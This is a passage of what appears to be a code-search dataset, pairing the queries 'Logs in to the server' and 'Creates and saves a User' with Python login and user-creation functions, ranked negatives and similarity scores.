#print(\"Shared secret:\")\n #print(self.sharedSecret)\n s = hashlib.sha256()\n s.update(bytes(str(self.sharedSecret).encode()))\n self.key = s.digest()" ]
[ "0.7266466", "0.6840144", "0.6624", "0.6536083", "0.6467815", "0.6440537", "0.6359403", "0.63546956", "0.63519514", "0.6313089", "0.62246615", "0.62246615", "0.6169524", "0.61688346", "0.6131176", "0.6095102", "0.60891443", "0.6085557", "0.60689396", "0.6060211", "0.6033049", "0.60202295", "0.59597", "0.59597", "0.5957856", "0.5947271", "0.5934865", "0.59346384", "0.593023", "0.5924253", "0.59170914", "0.59007305", "0.58993864", "0.58900386", "0.5887282", "0.5884582", "0.5873373", "0.5865987", "0.5858835", "0.5858835", "0.58443666", "0.58439845", "0.5838156", "0.5831107", "0.582528", "0.58227783", "0.5818972", "0.58123344", "0.5811503", "0.58009887", "0.58004314", "0.5796635", "0.57945675", "0.5782812", "0.57826185", "0.5742677", "0.57378775", "0.57325196", "0.5731513", "0.573102", "0.57172424", "0.57153606", "0.5714085", "0.571194", "0.5706188", "0.570538", "0.5704514", "0.57032543", "0.56942946", "0.5678398", "0.56756985", "0.56731427", "0.56699795", "0.5667769", "0.56654006", "0.56596035", "0.56571704", "0.5655939", "0.5650857", "0.5649768", "0.5647129", "0.5646106", "0.5643047", "0.5641333", "0.5639338", "0.5639149", "0.5633051", "0.5627434", "0.5626373", "0.5623863", "0.5622707", "0.56180483", "0.5609221", "0.5608564", "0.5603263", "0.5602235", "0.5600122", "0.5595563", "0.5595205", "0.5593619", "0.55871433" ]
0.0
-1
Logs in to the server
def login(self): hashkey = self.make_hash() connection = self.connection or self.connect() parameters = urlencode({ 'service' : config.service, 'auth' : hashkey }) print "parameters for login: '%s'" % (parameters) connectionstring = 'https://' + config.base_url + '/' \ + config.api_version + '/login' logger.info('Trying to login to REST: %s' % connectionstring) logger.info('Applying header: %s' % no_auth_headers) connection.request('POST', connectionstring, parameters, no_auth_headers) response = connection.getresponse() response_as_json = jloads(response.read()) self.auth_session_key = response_as_json['session_key'] self.auth_hostname = response_as_json['public_feed']['hostname'] self.auth_port = response_as_json['public_feed']['port'] basic_auth = b64encode("%s:%s" % (self.auth_session_key, self.auth_session_key)) self.auth_headers = no_auth_headers.copy() self.auth_headers['Authorization']="Basic %s" % (basic_auth) return response_as_json
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def login(self):\n\t\treturn", "def login():", "def login():", "def login(self):\n self.client.login(username=self.user.username, password='test')", "def login_user(self):\r\n self.client.login(username=self.user.username, password=\"password\")", "def login(self):\n\n self.__login_if_required()", "def login(self):", "def einloggen(self):\n \n self.c.login(self.username.text(), self.password.text(), \"1\")", "def login(self):\n r = self._login_token()", "def _login(self, *args, **kwargs):\n pass", "def log_in(self):\n\t\tpass", "def login(self):\n url = self.base_url + self.logon_url\n payload = {'username_or_email': self.user, 'password': self.passwd}\n try:\n resp = requests.post(url, headers=self.headers, data=json.dumps(payload), timeout=30, verify=False)\n print(resp.text)\n if resp.ok:\n self.headers.update(json.loads(resp.text)[\"session_id\"])\n print('hit login print')\n else:\n print('Could not login to {url} -->{}'.format(resp.text))\n return resp\n\n except requests.exceptions.ConnectionError:\n print('Connection Timed out --> {}'.format(url))", "def doLogin(self):\n\t\tlogin_data = urllib.urlencode({\n\t\t\t'operatorName' : self.username,\n\t\t\t'password' : self.password,\n\t\t\t'submit' : 'Iniciar+sesi%C3%B3n',\n\t\t})\n\n\t\tresponse = self.opener.open(\"http://172.16.0.2/tdserver/login_deal.jsp\", login_data)\t\t### deberia devolver verdadero o falso segun se logueo o no", "def login():\n pass", "def log_in(self):\n\n # Get login page.\n self.get_endpoint(endpoint=self.config['paths']['login'])\n\n # Post log-in data.\n email_form = self.browser.find_element_by_xpath(\"//input[@id='email']\")\n pw_form = self.browser.find_element_by_xpath(\"//input[@id='password']\")\n email_form.send_keys(self.credentials['email'])\n pw_form.send_keys(self.credentials['password'])\n\n # Initial log-in returns /private endpoint.\n self.browser.find_element_by_xpath(\"//input[@type='submit']\").click()", "def log_in(self):\n print('-=' * 12 + \" Log in \" + '-=' * 12)\n mob_num, password = self._input_mob_num('Mobile Number :'), input(\"Password: \")\n self._user = self.auth.log_in(mob_num, password)\n if self._user:\n print(\"you are logged in, Welcome '{}'\".format(self._user.username))\n self.homepage()\n else:\n print(\"Mobile number or/and password is/are Invaild \\n\" + '-=' * 30)\n options = {1: self.log_in, 2: self.logging_page, 3: self.exit}\n print_out = \"(1) Try Again \\n (2) Back to Logging Page \\n (3) Exit\"\n self._take_option(options, print_out)", "def login(self):\n url = 'https://ngb.to/login.php?do=login'\n\n params = {'do': 'login'}\n payload = {'vb_login_username': self.username,\n 'vb_login_password': self.password,\n 'url': \"index.php\",\n 'do': \"login\",\n 'vb_login_md5password': \"\",\n 'vb_login_md5password_utf': \"\",\n 's': \"\",\n 'securitytoken': \"guest\",\n 'cookieuser': \"1\"}\n\n self.session.post(url, data=payload, params=params)", "def login(self):\n self._client.clear_credentials()\n self._client.get('/v1/whoami')", "def login(self):\n self.session = requests.session()\n\n # Lie about the user agent because Lisa Zepto doesn't work without it.\n self.session.headers[\"User-Agent\"] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\"\n\n loginPayload = {\"admin_user\" : self.config.Username, \"admin_password\" : self.config.Password}\n loginResult = self.session.post(self.loginURL, data=loginPayload)\n\n if loginResult.status_code != 200:\n raise ConnectionError(\"Unable to login.\")", "def login(self, user=None, 
password=None):\n self._server.session_login(user=user, passwd=password)", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def on_start(self):\n self.login()", "def login(self):\n self.open(base_url + '/login')\n self.type(\"#email\", test_user.email)\n self.type(\"#password\", test_user.password)\n self.click('input[type=\"submit\"]')", "def _login(self):\n data = self._send(self.nc_request(action=\"login\", parameters={\"apipassword\": self._api_password}))\n\n self._session_id = data[\"apisessionid\"]\n\n logging.info(f\"logged in successfully with session id {self._session_id}\")", "def _login(self):\n url = self.server_url + '/api/v4/users/login'\n login_data = json.dumps({'login_id': self._user_id,\n 'password': self._user_pass})\n LOG.debug(\"Sending: %s\", login_data)\n response = self._request(self._session.post, url, data=login_data)\n LOG.debug(\"Received: %s\", response.json())\n\n if response.status_code != 200:\n raise RuntimeError(\"Cannot login. Server reported: %s\"\n % response.content)", "def login(self):\n self.open(self.urls['login'])\n self.select_form(nr=0)\n\n self.form['custno'] = self.username\n self.form['password'] = self.password\n res = self.submit()\n \n return res", "def login(self):\r\n\r\n # Open browser with the login URL\r\n self.browser.open(self.config[\"base_url\"] + \"login\")\r\n\r\n # Select the login form\r\n self.browser.select_form('form[action=\"/login/\"]')\r\n\r\n # Fill the login form.\r\n self.browser[\"email\"] = self.config[\"email\"]\r\n self.browser[\"password\"] = self.config[\"password\"]\r\n\r\n # Submit form\r\n self.browser.submit_selected()", "def do_login(self, password):\n # Creating JSON string with authentication credentails.\n in_data = ('{{ \"username\":\"{username}\",'\n '\"password\":\"{password}\" }}'\n ).format(\n username=self.pub_user,\n password=password\n )\n\n url = self.base_url + \"/oasis/login\"\n response = self.do_request(url, in_data)\n json_response = json.loads(response.content)\n\n if json_response[\"success\"] == False:\n print(\"Invalid user id or password\")\n else:\n self.cookies = dict(sessionid=response.cookies['sessionid'])\n print(\"You are logged into Mid-tier\")\n\n logger.info( 'Log in response ' + str(response.content))", "def login(self):\n logging.debug(\"login called\")\n\n # Apply settings\n self.localisationsettings.apply_to_upcoming_session()\n self.admin_setting.apply_to_upcoming_session()\n self.macspoof_setting.apply_to_upcoming_session()\n self.network_setting.apply_to_upcoming_session()\n\n self.mainwindow.hide()\n self.gdmclient.do_login()", "def login(self, **kwargs):\n\tusername = kwargs.get('username', self.username)\n\tif not username:\n\t raise RuntimeError, 'no username provided'\n\n\tpassword = kwargs.get('password', self.password)\n\tif not password:\n\t raise RuntimeError, 'no password provided'\n\tself.call('login', username=username, password=password)", "def login(self):\n\t\twhile True:\n\t\t\tos.system('clear')\n\t\t\tprint(\"1. Sign in\")\n\t\t\tprint(\"2. Sign up\")\n\t\t\tchoice = input()\n\t\t\tif choice == \"1\":\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself._sign_up()\n\n\t\twhile self._input():\n\t\t\tos.system(\"clear\")\n\t\t\tprint(\"Wrong username or password! 
Please re-enter.\")", "def logUserIn(self):\n self.browser.get(self.live_server_url)\n self.browser.get(self.live_server_url + reverse('registration:auth_login').rstrip())\n self.assertIn(\n 'login',\n self.browser.current_url\n )\n self.browser.find_element_by_name('username').send_keys(TEST_USER['username'])\n self.browser.find_element_by_id('id_password').send_keys(TEST_USER['password'])\n self.browser.find_element_by_id('submit-login').click()", "def login(self):\n \n self.br.open(\"http://kanji.koohii.com/login\")\n self.br.form = list(self.br.forms())[0]\n self.br[\"username\"] = USER\n self.br[\"password\"] = PASSWORD\n my_response = self.br.submit()\n print \"Login successful\"", "def login(self):\n\t\tbot = self.bot\n\t\tbot.get(URL)\n\t\ttime.sleep(2)\n\t\tsign_in = bot.find_element_by_class_name(\"nav__button-secondary\").click()\n\t\ttime.sleep(2)\n\t\temail = bot.find_element_by_id(\"username\")\n\t\temail.send_keys(self.username)\n\t\ttime.sleep(2)\n\t\tpassword = bot.find_element_by_id(\"password\")\n\t\tpassword.send_keys(self.password)\n\t\ttime.sleep(2)\n\t\tsign_in = bot.find_element_by_class_name(\"btn__primary--large.from__button--floating\").click()", "def logIn(self, username='admin', password='password'):\n # Open webbrowser, go to admin page\n self.browser.get(self.live_server_url + '/accounts/login/')\n\n # Enter username in log-in form\n username_field = self.browser.find_element_by_name('username')\n username_field.send_keys(username)\n\n # Enter password\n password_field = self.browser.find_element_by_name('password')\n password_field.send_keys('password')\n\n # Submit\n password_field.send_keys(Keys.RETURN)", "def login(email, password):\n rino.login.login(email, password)", "def login(email, password):\n rino.login.login(email, password)", "def login(self):\n self.driver.get(self.login)\n PAUSE = 2\n time.sleep(PAUSE)\n user_input = self.driver.find_element_by_name('username')\n pass_input = self.driver.find_element_by_name('password')\n login_button = self.driver.find_elements_by_xpath(\"//div[contains(text(),'Log In')]\")[0]\n user_input.send_keys(self.username)\n pass_input.send_keys(self.password)\n login_button.click()\n time.sleep(PAUSE)", "def login(self):\n self._session = requests.Session()\n data = {'login': self.username, 'password': self.password}\n url = self.address + '/login_generic'\n r = self._session.post(url, data=data)\n if 'field-login' in r.text:\n # Response still contains login form\n raise RuntimeError('Login failed.')", "def login(self):\n #raise NotImplementedError(\"This method must be overridden\")", "def login(self, username, password):\n return self.app.post('/login', data = dict(\n username = username,\n password = password\n ), follow_redirects = True)", "def login(self):\n driver = self.selenium_test.driver\n driver.get(self.selenium_test.get_server_url())\n self.selenium_test.wait_fn(self.preenche_username)\n driver.find_element_by_id('btnlogin').click()\n self.selenium_test.wait_to_be_logged_in()", "def login(self):\n login_form = {\"kid\": \"\",\n \"uni\": self.server,\n \"login\": self.username,\n \"pass\": self.password}\n url = \"https://%s.ogame.gameforge.com/main/login\" % self.country_code\n result = self.session.post(url, data=login_form)", "def do_login(self, login):\n if not login:\n print('please supply a user name to login')\n return\n self._user = re.sub(r'\\W', '_', str(login).strip().lower())\n print('Logged in as:', self._user)", "def login(self):\n if self._cookie_cached(self.login_email):\n 
self.cookie_login(self.login_email)\n else:\n self.new_login(self.login_email, self.login_pass)", "def login_user():\n pass", "def do_login(self):\n self.content = self._login()\n if self.with_tags:\n self.rest_content = self._login_vapi()", "def login(self):\r\n \r\n # Get the csrf token from the main URL\r\n csrf = self.extract_csrf(API.url_login)\r\n \r\n # Construnct the payload\r\n payload = self.cfg['payload']['login'][0]\r\n payload['csrfmiddlewaretoken'] = csrf\r\n\r\n # Test the entry with it's json schema\r\n check.check_entry(path='schemas/login.json', test=payload)\r\n\r\n # Login request \r\n requests.post(API.url_login, payload, headers={'Referer' : API.url_login})", "def login(self):\n # Enter login credentials\n WebDriverWait(self.driver, 120).until(\n EC.element_to_be_clickable(\n (By.ID, \"session_key-login\")\n )\n )\n elem = self.driver.find_element_by_id(\"session_key-login\")\n elem.send_keys(self.username)\n elem = self.driver.find_element_by_id(\"session_password-login\")\n elem.send_keys(self.password)\n # Enter credentials with Keys.RETURN\n elem.send_keys(Keys.RETURN)\n # Wait a few seconds for the page to load\n time.sleep(3)", "def do_login(self, backend, user):", "def login_bot(self):\n pass", "def authenticate(self):\n self.login(closet.app.config['USERNAME'],\n closet.app.config['PASSWORD'])", "def login(self, email, password):\r\n self.provide_info(email, password)\r\n self.submit()", "def do_login(cs, args):\n resp = cs.users.login(args.username, args.password, cs.baseurl)\n if resp.status_code == 200:\n print(\"Successfully login, session id: %s\" %\n resp.cookies.get('beegosessionID'))\n else:\n print(\"Failed to login! Please re-check your username and password\")", "def login(self):\n return self.client.login(username='Georgie', password='12345678')", "def login(args, syn):\n syn.login(args.synapseUser, args.synapsePassword, rememberMe=args.rememberMe)", "def login(self, configuration=False):\n if configuration:\n username = self.configuration_username\n password = self.configuration_password\n else:\n username = self.username\n password = self.password\n\n while callable(password):\n password = password()\n log.info(\"Logging into the netscaler at %s\", self.host)\n res = self.post(\"/login\", {\"login\": {\"username\": username, \"password\": password}})\n self.sessionid = res[\"sessionid\"]", "async def login(self, *args, **kwargs) -> None:\n logger.info(\"Logging in to Discord...\")\n\n self.http_session = ClientSession()\n\n await super().login(*args, **kwargs)", "def login(self, username, password):\n return self.app.post('/login', data=dict(\n username=username,\n password=password\n ), follow_redirects=True)", "def login(self):\n if not self.__initialized:\n raise NSNitroError(\"Not initialized.\")\n\n payload = {\"object\":json.dumps({\"login\":{\"username\":self.__user,\"password\":self.__password}})}\n try:\n nsresponse = self.post(payload)\n if nsresponse.failed:\n raise NSNitroError(nsresponse.message)\n\n self.__sessionid = nsresponse.get_response_field('sessionid')\n self.__postheaders = {'Cookie' : 'sessionid='+self.__sessionid, 'Content-type' : self.__contenttype}\n self.__loggedin = True\n return True\n\n except SyntaxError:\n raise NSNitroError(\"Could not parse LB response.\")\n except urllib2.URLError, ue:\n raise NSNitroError(\"Error logging in!\" + ue.message)", "def login(self, username, password):\n\t\turl = \"https://habitica.com/api/v3/user/auth/local/login\"\n\t\tpayload = {\"username\": username, \"password\": 
password}\n\t\treturn(postUrl(url, self.credentials, payload))", "def login(self):\n with self.client.post(\"/login\", {\"username\":self.user.username,\n \"password\":MASTER_PASSWORD},\n catch_response=True) as response:\n for r_hist in response.history:\n if r_hist.cookies.get('token') is not None:\n response.success()\n return\n response.failure(\"login failed\")", "def __login(self, args = []):\n\n try:\n \n # Send username and wait for an ACK\n self.__cm.send(p.T_USER, [self.__username])\n reply = self.__cm.receive()\n \n if (reply.type != p.T_ACK):\n raise Exception, \"Unable to login!\"\n\n # Send password and wait for an ACK\n self.__cm.send(p.T_PASS, [self.__password])\n reply = self.__cm.receive()\n \n if (reply.type != p.T_ACK):\n raise Exception, \"Invalid credentials!\"\n\n except Exception,e:\n self.__handleError('Authenticate', e)", "def log_in(self, ctx: Context):\n email = json.loads(ctx.users)['username']\n password = json.loads(ctx.users)['password']\n InputFunctions.send_keys_to_element_by_name(\n self.ctx, self.locators, \"email_input\", email\n )\n InputFunctions.send_keys_to_element_by_name(\n self.ctx, self.locators, \"password_input\", password\n )\n ClickFunctions.click_element_by_name(ctx, self.locators, \"login_button\")\n ClickFunctions.click_element_by_name(ctx, self.locators, \"back_to_content\")", "def do_login(self):\n if self.app.authentication_only:\n self.app.stop()\n else:\n self.set_screen(EXPLORER)", "def login(self, username, password):\n raise NotImplementedError\n # data = self.prepare_data_for_requests_post(username, password)\n #\n # # post request using session created at instantiation\n # r = self.session.post(self.start_url, data=data)\n #\n # return r.ok", "def login(self, username, password):\n return self.post('/login', data={\n 'username': username,\n 'password': password\n }, follow_redirects=True)", "def loginAsManager(self):\n self.browser.open('http://nohost/plone/')\n self.browser.getLink('Log in').click()\n self.browser.getControl('Login Name').value = 'root'\n self.browser.getControl('Password').value = 'secret'\n self.browser.getControl('Log in').click()", "def login(**kwargs):\n root_commands.cmd_login(**kwargs)", "def _login(self):\n body = {\n 'name': self.username,\n 'password': self.password\n }\n\n # Unset token now, otherwise potential expired token will be sent\n # along to be used for authorization when trying to login.\n\n try:\n LOG.debug('Getting Datera auth token.')\n results = self._issue_api_request('login', 'put', body=body,\n sensitive=True)\n self.datera_api_token = results['key']\n except exception.NotAuthorized:\n with excutils.save_and_reraise_exception():\n LOG.error(_LE('Logging into the Datera cluster failed. 
Please '\n 'check your username and password set in the '\n 'cinder.conf and start the cinder-volume '\n 'service again.'))", "def login(self):\n login = self.client.login(username=self.username, password=self.password)\n return login", "def login(self):\n login = self.client.login(username=self.username, password=self.password)\n return login", "def login():\n login_page = Login()\n login_page.login_main_page()", "def main_login(\n client: CitusCloudMgmt,\n **opts: tp.Any\n) -> None:\n client.login()\n logger.info(\"successfully logged in\")", "def do_login(user, password):\n return um.do_login(user, password)", "def login(self, login):\n\n self._login = login", "def registrieren(self):\n self.c.login(self.username.text(), self.password.text(), \"0\")", "def login_user(self, username, pwd):\n self.browser.get(\"%s%s\" %\n (str(self.live_server_url), '/accounts/login/'))\n username_input = self.browser.find_element_by_id('id_username')\n password_input = self.browser.find_element_by_id('id_password')\n submission_button = self.browser.find_element_by_class_name(\n 'btn-success')\n\n username_input.send_keys(username)\n password_input.send_keys(pwd)\n submission_button.click()", "def login_into_time_watch(self) -> None:\n logger.debug('Try to login to %s', self._url)\n self._driver.get(self._url)\n self._driver.find_element_by_xpath(\n '// *[@id=\"compKeyboard\"]').send_keys(self.params['user']['company'])\n self._driver.find_element_by_xpath(\n '//*[@id=\"nameKeyboard\"]').send_keys(self.params['user']['worker'])\n self._driver.find_element_by_xpath(\n '//*[@id=\"pwKeyboard\"]').send_keys(self.params['user']['pswd'])\n self._driver.find_element_by_xpath(\n '//*[@id=\"cpick\"]/table/tbody/tr[1]/td/div/div[2]/p/table/tbody/tr[4]/td[2]/input').click()\n logger.info('Logged in for worker %s', self.params['user']['worker'])", "def click_login(self):\n self.login.click()\n return self.login", "def login_action(login_page, request, driver):\n login_page.login(request.config.getoption(\"--username\"), request.config.getoption(\"--password\"))", "def login(self):\n # create auth payload\n payload = '{{\"grant_type\": \"password\", \"username\": \"{}\", \"password\": \"{}\"}}'.format(\n self.username, self.password)\n auth_headers = {**FTDClient.headers}\n r = requests.post(\"https://{}:{}/api/fdm/{}/fdm/token\".format(self.server_address, self.server_port, self.version),\n data=payload, verify=False, headers=auth_headers)\n if r.status_code == 400:\n raise Exception(\"Error logging in: {}\".format(r.content))\n try:\n # This token will act as the\n self.access_token = r.json()['access_token']\n # cache the original token in case we do a custom login\n self.original_access_token = self.access_token\n except:\n logging.error(\n f'Unable to log into server: https://{self.server_address}:{self.server_port}')\n raise", "def login(self):\n self.driver.get(f'{self.base_url}/signin')\n\n # Fill username and password\n enter_username = WebDriverWait(self.driver, 20).until(expected_conditions.presence_of_element_located((By.NAME, 'email')))\n enter_username.send_keys(self.username)\n enter_password = WebDriverWait(self.driver, 20).until(expected_conditions.presence_of_element_located((By.NAME, 'password')))\n enter_password.send_keys(self.password)\n\n # Press the Log In Button\n self.driver.find_element_by_xpath('//*[@id=\"root\"]/div/div[3]/div/div/div/div/div[2]/div/form/div/div[2]/button').click()\n\n # Wait for the page to load (5 seconds)\n sleep(5)", "def _log_into_shib( self, driver ):\n 
driver.find_element_by_id(\"username\").clear()\n driver.find_element_by_id(\"username\").send_keys( self.USERNAME )\n driver.find_element_by_id(\"password\").clear()\n driver.find_element_by_id(\"password\").send_keys( self.PASSWORD )\n driver.find_element_by_css_selector(\"button[type=\\\"submit\\\"]\").click()\n return driver", "def log_in(self):\n if self.is_logged_in():\n return\n\n req_html = request.urlopen(\"https://www.linkedin.com/uas/login\").read()\n soup = BeautifulSoup(req_html)\n csrf = soup.find(id=\"loginCsrfParam-login\")['value']\n\n login_data = parse.urlencode({\n 'session_key': self.username,\n 'session_password': self.password,\n 'loginCsrfParam': csrf\n })\n\n data = login_data.encode()\n\n password_manager = request.HTTPPasswordMgrWithDefaultRealm()\n password_manager.add_password(None, \"https://www.linkedin.com/\", self.username, self.password)\n\n Registration.opener.add_handler(request.HTTPBasicAuthHandler(password_manager))\n\n response = request.urlopen(\"https://www.linkedin.com/uas/login-submit\", data)\n res_html = BeautifulSoup(response.read())\n\n Registration.jar.save(Registration.cookie_filename)\n\n return response", "def login(self, address, username, password, command_logger=None):\r\n\r\n #Set object IP address, username, and password\r\n self.address = address\r\n self.username = username\r\n self.password = password", "def open(self):\n\n login_url = ('{0}://{1}/admin/launch'.format(self.proto, self.host) +\n '?script=rh&template=login&action=login')\n\n login_data = urllib.urlencode({'d_user_id': 'user_id',\n 't_user_id': 'string',\n 'c_user_id': 'string',\n 'e_user_id': 'true',\n 'f_user_id': self.user,\n 'f_password': self.password,\n 'Login': 'Login',\n })\n\n # Handle various login responses. A valid login must contain all\n # of the following searched for parameters.\n valid_responses = [['template=dashboard', \"HTTP-EQUIV='Refresh'\"],\n ['template=index', 'HTTP-EQUIV=\"Refresh\"']]\n\n try:\n resp = self._handle.open(login_url, login_data).read()\n for valid_response_list in valid_responses:\n checks = [x in resp for x in valid_response_list]\n if all(checks):\n self.log('Successfully logged in using {0}'.format(\n self.proto))\n self._closed = False\n return True\n else:\n self.log('Failed to login using {0}'.format(self.proto))\n self.log(resp, True)\n except (urllib2.HTTPError, urllib2.URLError) as e:\n self.log('{0} {1}: {2}'.format(e.__class__.__name__, self.host, e))\n\n return False", "def login(self, username: Optional[str], password: Optional[str]) -> None:\n self.username_field.fill(username)\n self.password_field.fill(password)\n\n self.submit_button.click()", "def log_in():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n if PLAN.login_user(username, password):\n session['name'] = username\n flash(\"Login success ...\")\n return redirect(url_for('index'))\n flash(\"Login failed ...\")\n return render_template('login.html')\n return render_template('login.html')", "def login(self, username, password):\n log.info(\"Inserting credentials on login page.\")\n self._driver.fill(self.UsernameFieldSelector, username)\n self._driver.fill(self.PasswordFieldSelector, password)\n self.get_continue_button().click()", "def login(self, email='khaleesi@targaryen.com', password='password'):\n return login(self.client, email, password)", "def login(self, input_user, input_pass):\n\n self.failed = False\n try:\n self.send_message('/login [' + input_user + '] [' + input_pass + 
']\\r')\n\n except:\n sys.stderr.write('failed to login to server. \\n') \n Self.failed = True\n return False\n\n return True", "def Login(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def login(self, username, password):\n response = self.call('auth.login', username, password)\n if response[b'result'] == b'success':\n self.sessionid = response[b'token']\n self.authenticated = True", "def _login(self, login):\n self._tokens.clear()\n name, password = login\n\n params = {\"action\": \"query\", \"meta\": \"tokens\", \"type\": \"login\"}\n with self._api_lock:\n result = self._api_query(params, no_assert=True)\n try:\n token = result[\"query\"][\"tokens\"][\"logintoken\"]\n except KeyError:\n raise exceptions.LoginError(\"Couldn't get login token\")\n\n params = {\"action\": \"login\", \"lgname\": name, \"lgpassword\": password,\n \"lgtoken\": token}\n with self._api_lock:\n result = self._api_query(params, no_assert=True)\n\n res = result[\"login\"][\"result\"]\n if res == \"Success\":\n self._tokens.clear()\n self._save_cookiejar()\n return\n if res == \"Illegal\":\n e = \"The provided username is illegal.\"\n elif res == \"NotExists\":\n e = \"The provided username does not exist.\"\n elif res == \"EmptyPass\":\n e = \"No password was given.\"\n elif res == \"WrongPass\" or res == \"WrongPluginPass\":\n e = \"The given password is incorrect.\"\n else:\n e = \"Couldn't login; server says '{0}'.\".format(res)\n raise exceptions.LoginError(e)", "def login(self):\n url = self._root + self._routes[\"login\"]\n self.r = self.reqsession.get(url) \n if self.r.url == 'https://console.zerodha.com/dashboard':\n cookies = self.reqsession.cookies.get_dict('console.zerodha.com')\n self.console_session = cookies['session']\n self.public_token = self.reqsession.cookies['public_token']\n return True\n else:\n raise Exception(\"Login failed or Kite session expired\")", "def login(self, username, password):\n self.user = User(username=username, password=password, sess=self.session)", "def _logon(self):\n\n # if password is provided send it\n if self.password:\n rlog(10, self.name ,'sending password')\n self._raw(\"PASS %s\" % self.password)\n\n # register with irc server\n rlog(10, self.name, 'registering with %s using nick %s' % \\\n(self.server, self.nick))\n rlog(10, self.name, 'this may take a while')\n\n # check for username and realname\n username = self.nick or self.cfg['username']\n realname = self.cfg['realname'] or username\n\n # first send nick\n time.sleep(1)\n self._raw(\"NICK %s\" % self.nick)\n time.sleep(1)\n\n # send USER\n self._raw(\"USER %s localhost localhost :%s\" % (username, \\\nrealname))\n\n # wait on login\n self.connectok.wait()", "def login_user(self, username=\"foo\", pwd=\"password\"):\n return self.client.post(url_for('login'),\n data = {'username': username,\n 'password': pwd})" ]
[ "0.7973264", "0.7904653", "0.7904653", "0.7693467", "0.7655902", "0.7554838", "0.7549945", "0.7540455", "0.7519316", "0.7478677", "0.746458", "0.74409384", "0.7430161", "0.74290764", "0.7427556", "0.73943985", "0.7350303", "0.7341028", "0.73346376", "0.7320527", "0.73103094", "0.73103094", "0.73103094", "0.73103094", "0.7305757", "0.7292797", "0.72762305", "0.7216218", "0.72000116", "0.7196603", "0.7191955", "0.718072", "0.71777785", "0.71620435", "0.7161972", "0.7150208", "0.7142292", "0.711551", "0.711551", "0.7071095", "0.70627105", "0.70505255", "0.7043438", "0.70393676", "0.70370054", "0.7030825", "0.7019374", "0.70171046", "0.70135945", "0.69969195", "0.699153", "0.69840235", "0.69717216", "0.69633955", "0.6955936", "0.6924877", "0.6916802", "0.6916637", "0.6908437", "0.6903569", "0.6903325", "0.69013065", "0.6889099", "0.6874601", "0.68729365", "0.68662626", "0.6863342", "0.6863257", "0.6854222", "0.6848292", "0.6837186", "0.6835001", "0.6834047", "0.6834047", "0.68296266", "0.6826224", "0.68157446", "0.68125844", "0.6804301", "0.6790028", "0.6771608", "0.67381597", "0.6736401", "0.67338777", "0.6721514", "0.671046", "0.6688875", "0.6674819", "0.6674554", "0.6668705", "0.6659279", "0.66573346", "0.6645888", "0.66401094", "0.66348785", "0.66335905", "0.6627398", "0.66231424", "0.6622618", "0.66123855", "0.6611968" ]
0.0
-1
Creates and saves a User with the given email and password.
def _create_user(self, email, password, **extra_fields): if not email: raise ValueError('The given email must be set') email = self.normalize_email(email) user = self.model(email=email, **extra_fields) user.set_password(password) user.save(using=self._db) return user
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password=None, **extra_fields):\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n print(\"create user\")\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('The Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n\n if not email:\n raise ValueError(\"Vous devez renseigner un email!\")\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('Please provide your email address'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError(_('Email must be set'))\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def create_user(email, password='test', **kwargs):\n user = get_user_model().objects.create(email=email, **kwargs)\n user.set_password(password)\n user.save()\n return user", "def _create_user(self, email, password, **extra_fields):\n email = self.normalize_email(email)\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, first_name, last_name, password, **extra_fields):\n if not email:\n raise ValueError(_('Email Address is required'))\n email = self.normalize_email(email)\n user = self.model(\n email=email,\n first_name=first_name,\n last_name=last_name,\n **extra_fields\n )\n user.set_password(password)\n user.save(using=self._db)\n return user", "def _create_user(self, email, password, **extra_fields):\n if not email:\n raise ValueError('The Email must be set')\n email = 
